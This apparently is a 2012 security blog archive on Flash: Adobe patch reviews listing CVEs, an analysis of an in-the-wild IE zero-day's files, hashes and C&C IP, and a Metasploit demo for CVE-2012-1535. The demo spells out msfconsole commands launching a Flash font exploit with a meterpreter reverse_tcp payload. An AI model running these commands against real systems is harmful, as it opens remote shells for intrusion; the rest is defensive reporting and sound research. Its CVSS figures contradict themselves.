Tag Archives: Flash

APSB12-22 – Adobe October 2012 Patch Tuesday Review

Adobe has release, the 8 October 2012, during his October Patch Tuesday, one security bulletin dealing with 25 vulnerabilities. All these security bulletins have a Critical severity rating. All of these vulnerabilities have a CVSS base score of 10.0.

APSB12-22 – Security updates available for Adobe Flash Player

APSB12-22 is concerning :

  • Adobe Flash Player 11.4.402.278 and earlier versions for Windows
  • Adobe Flash Player 11.4.402.265 and earlier versions for Macintosh
  • Adobe Flash Player 11.2.202.238 and earlier versions for Linux
  • Adobe Flash Player 11.1.115.17 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.16 and earlier versions for Android 3.x and 2.x
  • Adobe AIR 3.4.0.2540 and earlier versions for Windows and Macintosh
  • Adobe AIR 3.4.0.2540 SDK (includes AIR for iOS) and earlier versions
  • Adobe AIR 3.4.0.2540 and earlier versions for Android

CVE-2012-5248 (CVSS base score of 10.0), CVE-2012-5249 (CVSS base score of 10.0), CVE-2012-5250 (CVSS base score of 10.0), CVE-2012-5251 (CVSS base score of 10.0), CVE-2012-5252 (CVSS base score of 10.0), CVE-2012-5253 (CVSS base score of 10.0), CVE-2012-5254 (CVSS base score of 10.0), CVE-2012-5255 (CVSS base score of 10.0), CVE-2012-5256 (CVSS base score of 10.0), CVE-2012-5257 (CVSS base score of 10.0), CVE-2012-5258 (CVSS base score of 10.0), CVE-2012-5259 (CVSS base score of 10.0), CVE-2012-5260 (CVSS base score of 10.0), CVE-2012-5261 (CVSS base score of 10.0), CVE-2012-5262 (CVSS base score of 10.0), CVE-2012-5263 (CVSS base score of 10.0), CVE-2012-5264 (CVSS base score of 10.0), CVE-2012-5265 (CVSS base score of 10.0), CVE-2012-5266 (CVSS base score of 10.0), CVE-2012-5267 (CVSS base score of 10.0), CVE-2012-5268 (CVSS base score of 10.0), CVE-2012-5269 (CVSS base score of 10.0), CVE-2012-5270 (CVSS base score of 10.0) and CVE-2012-5271 (CVSS base score of 10.0) have been discovered and reported by Mateusz Jurczyk, Gynvael Coldwind, and Fermin Serna of the Google Security Team.

CVE-2012-5272 (CVSS base score of 10.0) has been discovered and reported by instruder of Code Audit Labs of vulnhunt.com.

All these vulnerabilities have, at this moment, unknown CVSS 2.0 base scores, but could lead to code executions.

I advise you to update asap your Adobe Flash Player.

Zero-Day Season Is Really Not Over Yet

I can confirm, the zero-day season is really not over yet. Less than three weeks after the discovery of the Java SE 7 0day, aka CVE-2012-4681, potentially used by the Nitro gang in targeted attacks, a potential Microsoft Internet Explorer 7 and 8 zero-day is actually exploited in the wild.

First I would like to thanks the nice people (@binjo@_sinn3r and all the guys of the Metasploit IRC channel on freenode) how helped me to understand and go further in my investigations.

Second, I would like to clarify some points:

  • I wasn’t a target of the 0day, I tested it on my lab. This misunderstanding has been introduced by Reuters in their press release.
  • I did these researches on my personal time, and these researches are not linked with my professional activities. This misunderstanding has been introduced by Reuters in their press release.
  • I don’t pin the responsibility on the Nitro gang, if you read my blog post, you will see that I found coincidences.
  • I don’t know the timeline of the vulnerability, including when it was discovered and how long it has been exploited.

Since the release of the Java SE 7 0day I was monitoring some of the infected servers used by the alleged Nitro gang (take a look at the updates at the end of the blog post). The 14th September morning, I discovered a “/public/help” folder on one of these servers, the Italian one (smile to @PhysicalDrive0).

As seen in the following screenshot, 4 files were hosted in this folder, and as a curious man, I downloaded everything to see what was related to these files.

I tested these files on an up-to-date Microsoft Windows XP Pro SP3 with an up-to-date Adobe Flash (11,4,402,265). Surprise they dropped files on my test computer (See demonstration video here under) ! A new 0day ?  I decide then to take a deeper look at the grabbed files.

exploit.html

This file is recognized as an HTML file, and catched by 0 anti-viruses on VirusTotal (9d66323794d493a1deaab66e36d36a820d814ee4dd50d64cddf039c2a06463a5).

exploit.html” is the entry point of the attack. This file creates an array of “img” and load “Moh2010.swf” Flash file.

Moh2010.swf

This file is recognized as a Macromedia Flash Player movie, and catched by 0 anti-viruses on VirusTotal (70f6a2c2976248221c251d9965ff2313bc0ed0aebb098513d76de6d8396a7125).

You can observe that the file is packed by DoSWF and that it is decompress in the memory. After decompression “Moh2010.swf” file is spraying the heap and eval an iframe to “Protect.html” file.

The ActionScript embedded in the original packed SWF file, is also interesting, you will see some special encoding (Chinese ?).

Decoded SWF file, is known as “Exploit:SWF/CVE-2010-2884.B”, or “SWF:Dropper” on VirusTotal (dd41efa629c7f7f876362c5ca6d570be6b83728a2ce8ecbef65bdb89cb402b0f) and detected only by 3/34 anti-viruses. Thanks to binjo.

This file, during exploitation is also checking if the web site is present in Flash Website Storage Settings pannel to no more load the “Protect.html” file. This mean, that once infected the user will no more be exploited despite further visites to the web site.

Display on the first visit

Characters displayed on the first visit

Display on successful exploitation

Display on successfull exploitation

Display on further visits

Protect.html

This file is recognized as an HTML file, and catched by 0 anti-viruses on VirusTotal (2a2e2efffa382663ba10c492f407dda8a686a777858692d073712d1cc9c5f265).

If you take a look at the source code, you can see interesting javascript code, how is manipulating the “img” array created by “exploit.html“.

You will also see that tests are done, in order to target Windows XP 32-bit and Internet Explorer 7 or 8.

111.exe

This file is recognized as a Autodesk FLIC image file, and catched by 0 anti-viruses on VirusTotal (a5a04f661781d48df3cbe81f56ea1daae6ba3301c914723b0bb6369a5d2505d9).

Submitted to Malware Tracker (baabd0b871095138269cf2c53b517927), this file look like suspicious and require further investigations. “111.exe” is packed and after decoding the file is still not detected by any anti-virus on VirusTotal (a6086c16136ea752fc49bc987b8cc9e494384f372ddfdca85c2a5b7d43daa812). But with a Malwr analysis, you can see that this file is recognized as installing a program to run automatically at logon.

Conclusion

The guys how developed this new 0day were not happy to have been catched, they just removed all the files from the source server 2 days after my discovery. But also more interesting the also removed a Java 0day variant from other folders.

Also I submitted all these stuff to different person in order to confirm the strangeness of this exploit, and we got some good return.

Updates

Sunday 09/16:

Metasploit team is planning to release an exploit module on Monday. This module seems to work very well.

Monday 09/17:

Metasploit has release an exploit module “ie_execcommand_uaf and this module is working for IE 7/8/9 on XP/Vista/7.

AlienVault Labs has provide some additional information s regarding DoSWF file and the C&C server aka “12.163.32.15“.

Microsoft has release MSA-2757760 and recommend to install EMET (Enhanced Mitigation Experience Toolkit) 3.0 and other mitigation solutions.

Tuesday 09/18:

AlienVault Labs has provide more details on the potential source of the attack.

It seems the guys behind this 0day were targeting specific industries. We’ve seen that they compromised a news site related to the defense industry and they created a fake domain related to LED technologies that can be used to perform spearphishing campaigns to those industries.

Wednesday 09/19:

AlienVault Labs has report variant of the “Protect.html” file, named “Dodge.html” how is now also infecting Windows 7 32 bits running Java6 with Internet Explorer 9, and confirm the usage of the 0day in targeted attacks.

Microsoft propose a Fix it KB2757760 solution, “Prevent Memory Corruption via ExecCommand in Internet Explorer“, that prevents exploitation of this issue.

Microsoft has publish an advanced notification “Microsoft Security Bulletin Advance Notification for September 2012” for one out-of-band security bulletin that Microsoft is intending to release on September 21, 2012. The bulletin will addresses security vulnerabilities in Internet Explorer. The vulnerability is also affecting Internet Explorer on Windows Server 2003 and 2008.

Friday 09/21:

Microsoft has release the promised update MS12-063 in order to fix the 0day vulnerability. If you use Internet Explorer, I advice you to update as soon as possible !

Adobe APSB12-19 Flash Player Update Review

Adobe has release, the 21 August 2012, just one week after his Patch Tuesday release, an out of band patch APSB12-19 updating Flash Player 10.x and 11.x. This update correct 6 vulnerabilities, all these vulnerabilities have a Critical severity rating and 5 of the 6 vulnerabilities have a base CVSS score of 10.0.

CVE-2012-4163, with a CVSS base score of 10.0, how could lead to code execution, has been discovered and privately reported by Xu Liu of Fortinet’s FortiGuard Labs.

CVE-2012-4164, with a CVSS base score of 10.0, how could lead to code execution, has been discovered and privately reported by Will Dormann of CERT.

CVE-2012-4165 and CVE-2012-4166, with both a CVSS base score of 10.0, how could lead to code execution, has been discovered and privately reported by Honggang Ren of Fortinet’s FortiGuard Labs.

CVE-2012-4167, with a CVSS base score of 10.0, how could lead to code execution, has been discovered and privately reported by Alexander Gavrun through iDefense’s Vulnerability Contributor Program.

CVE-2012-4168, with a CVSS base score of 4.3, how could lead to information leak, has been discovered and privately reported by Opera Software ASA.

CVE-2012-1535 Adobe Flash Player Vulnerability Metasploit Demo

Timeline :

Vulnerability found exploited in the wild and reported by Alexander Gavrun
Vulnerability reported by the vendor the 2012-08-14
Metasploit PoC provided the 2012-08-17

PoC provided by :

Alexander Gavrun
juan vazquez
sinn3r

Reference(s) :

APSB12-18
CVE-2012-1535
OSVDB-84607
BID-55009

Affected version(s) :

Adobe Flash Player 11.3.300.270 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.236 and earlier versions for Linux
Flash Player installed with Google Chrome earlier version 21.0.1180.79.

Tested on Windows 7 Integral with :

Internet Explorer 9
Adobe Flash Player 11.3.300.268

Description :

This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the SWF, it is possible to gain arbitrary remote code execution under the context of the user, as exploited in the wild.

Commands :

use exploit/windows/browser/adobe_flash_otf_font
set SRVHOST 192.168.178.100
set ROP JRE
set TARGET 6
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid